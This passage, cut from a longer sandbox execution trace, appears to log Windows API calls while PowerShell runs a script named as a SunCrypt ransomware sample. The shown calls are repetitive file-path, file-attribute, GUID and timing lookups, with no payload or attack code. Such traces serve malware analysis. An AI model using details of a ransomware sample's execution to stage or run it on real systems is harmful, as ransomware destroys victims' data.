lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.305] EtwEventActivityIdControl () returned 0x0 [0102.353] EtwEventActivityIdControl () returned 0x0 [0102.353] EtwEventActivityIdControl () returned 0x0 [0102.353] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc764e2c8, Data2=0xb201, Data3=0x49d8, Data4=([0]=0x9d, [1]=0x80, [2]=0x4c, [3]=0x26, [4]=0x9e, [5]=0x90, [6]=0xc3, [7]=0xcc))) returned 0x0 [0102.353] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.353] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.353] CoTaskMemFree (pv=0x4280e80) [0102.353] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b 
[0102.353] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0102.354] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0102.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.355] EtwEventActivityIdControl () returned 0x0 [0102.355] EtwEventActivityIdControl () returned 0x0 [0102.355] EtwEventActivityIdControl () returned 0x0 [0102.355] EtwEventActivityIdControl () returned 0x0 [0102.356] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7edd0a1e, Data2=0xa1ed, Data3=0x4cbe, Data4=([0]=0x86, [1]=0x96, [2]=0xbe, [3]=0xe2, [4]=0x20, [5]=0x15, [6]=0xf2, [7]=0x81))) returned 0x0 [0102.356] CoTaskMemAlloc (cb=0x2d4) returned 
0x4280e80 [0102.356] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.356] CoTaskMemFree (pv=0x4280e80) [0102.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0102.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0102.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.357] EtwEventActivityIdControl () returned 0x0 [0102.357] 
EtwEventActivityIdControl () returned 0x0 [0102.357] EtwEventActivityIdControl () returned 0x0 [0102.357] EtwEventActivityIdControl () returned 0x0 [0102.358] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x832849b5, Data2=0x9536, Data3=0x4b34, Data4=([0]=0x9b, [1]=0x72, [2]=0x32, [3]=0xeb, [4]=0xe4, [5]=0x5e, [6]=0x66, [7]=0x72))) returned 0x0 [0102.358] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.358] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.358] CoTaskMemFree (pv=0x4280e80) [0102.358] EtwEventActivityIdControl () returned 0x0 [0102.358] EtwEventActivityIdControl () returned 0x0 [0102.358] EtwEventActivityIdControl () returned 0x0 [0102.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0102.359] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) 
returned 1 [0102.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.362] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701517887054) returned 1 [0102.426] EtwEventActivityIdControl () returned 0x0 [0102.430] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x4297ac38, Data2=0xa849, Data3=0x4b04, Data4=([0]=0xb9, [1]=0x33, [2]=0xf6, [3]=0xb6, [4]=0xff, [5]=0xf1, [6]=0xf, [7]=0xe9))) returned 0x0 [0102.430] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.430] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.430] CoTaskMemFree (pv=0x4280e80) [0102.430] EtwEventActivityIdControl () returned 0x0 [0102.430] EtwEventActivityIdControl () returned 0x0 [0102.430] EtwEventActivityIdControl () returned 0x0 [0102.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0102.430] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0102.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.004] EtwEventActivityIdControl () returned 0x0 [0103.040] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x5a032eb0, Data2=0x2814, Data3=0x46ec, Data4=([0]=0x84, [1]=0xe4, [2]=0x28, [3]=0x8b, [4]=0x26, [5]=0xb9, [6]=0xe4, [7]=0x38))) returned 0x0 [0103.041] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.041] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.041] CoTaskMemFree (pv=0x4280e80) [0103.041] EtwEventActivityIdControl () returned 0x0 [0103.041] EtwEventActivityIdControl () returned 0x0 [0103.041] EtwEventActivityIdControl () returned 0x0 [0103.042] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701585854404) returned 1 [0103.042] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, 
lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.042] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0103.042] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0103.043] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.043] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.046] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701586232856) returned 1 [0103.078] EtwEventActivityIdControl () returned 0x0 [0103.169] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x8d797e0a, Data2=0xe752, Data3=0x44d4, Data4=([0]=0x83, [1]=0xbd, [2]=0x1f, [3]=0x1f, [4]=0x35, [5]=0xa0, [6]=0xdb, [7]=0x71))) returned 0x0 
[0103.169] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.169] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.169] CoTaskMemFree (pv=0x4280e80) [0103.169] EtwEventActivityIdControl () returned 0x0 [0103.169] EtwEventActivityIdControl () returned 0x0 [0103.169] EtwEventActivityIdControl () returned 0x0 [0103.169] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0103.170] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0103.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, 
lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.263] EtwEventActivityIdControl () returned 0x0 [0103.286] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x6114482, Data2=0x167, Data3=0x4004, Data4=([0]=0x9c, [1]=0x16, [2]=0x64, [3]=0x89, [4]=0x51, [5]=0xef, [6]=0xba, [7]=0x9a))) returned 0x0 [0103.286] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.286] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.286] CoTaskMemFree (pv=0x4280e80) [0103.286] EtwEventActivityIdControl () returned 0x0 [0103.287] EtwEventActivityIdControl () returned 0x0 [0103.287] EtwEventActivityIdControl () returned 0x0 [0103.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0103.287] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.287] 
SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0103.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.364] EtwEventActivityIdControl () returned 0x0 [0103.371] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x516a21f7, Data2=0x9538, Data3=0x4e79, Data4=([0]=0x8f, [1]=0x7b, [2]=0x79, [3]=0xc5, [4]=0x85, [5]=0xfb, [6]=0xcd, [7]=0x25))) returned 0x0 [0103.372] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.372] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.372] CoTaskMemFree (pv=0x4280e80) [0103.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.372] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.379] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701619559550) returned 1 [0103.379] EtwEventActivityIdControl () returned 0x0 [0103.379] EtwEventActivityIdControl () returned 0x0 [0103.379] EtwEventActivityIdControl () returned 0x0 [0103.379] EtwEventActivityIdControl () returned 0x0 [0103.380] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xefd6b436, Data2=0x9660, Data3=0x4570, Data4=([0]=0xbb, [1]=0xfa, [2]=0x2c, [3]=0x3b, [4]=0xe0, [5]=0x5e, [6]=0x7, [7]=0xd))) returned 0x0 [0103.380] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.380] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.380] CoTaskMemFree (pv=0x4280e80) [0103.380] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701619707252) returned 1 [0103.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.381] GetFullPathNameW 
(in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.381] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.383] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701619946660) returned 1 [0103.383] EtwEventActivityIdControl () returned 0x0 [0103.383] EtwEventActivityIdControl () returned 0x0 [0103.383] EtwEventActivityIdControl () returned 0x0 [0103.383] EtwEventActivityIdControl () returned 0x0 [0103.383] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2add78df, Data2=0x4a34, Data3=0x4a92, Data4=([0]=0xb5, [1]=0xb8, [2]=0x44, 
[3]=0xa6, [4]=0x8e, [5]=0x65, [6]=0xb2, [7]=0xed))) returned 0x0 [0103.384] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0103.384] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0103.384] CoTaskMemFree (pv=0x4280e80) [0103.384] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701620072859) returned 1 [0103.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.384] GetFullPathNameW (in: 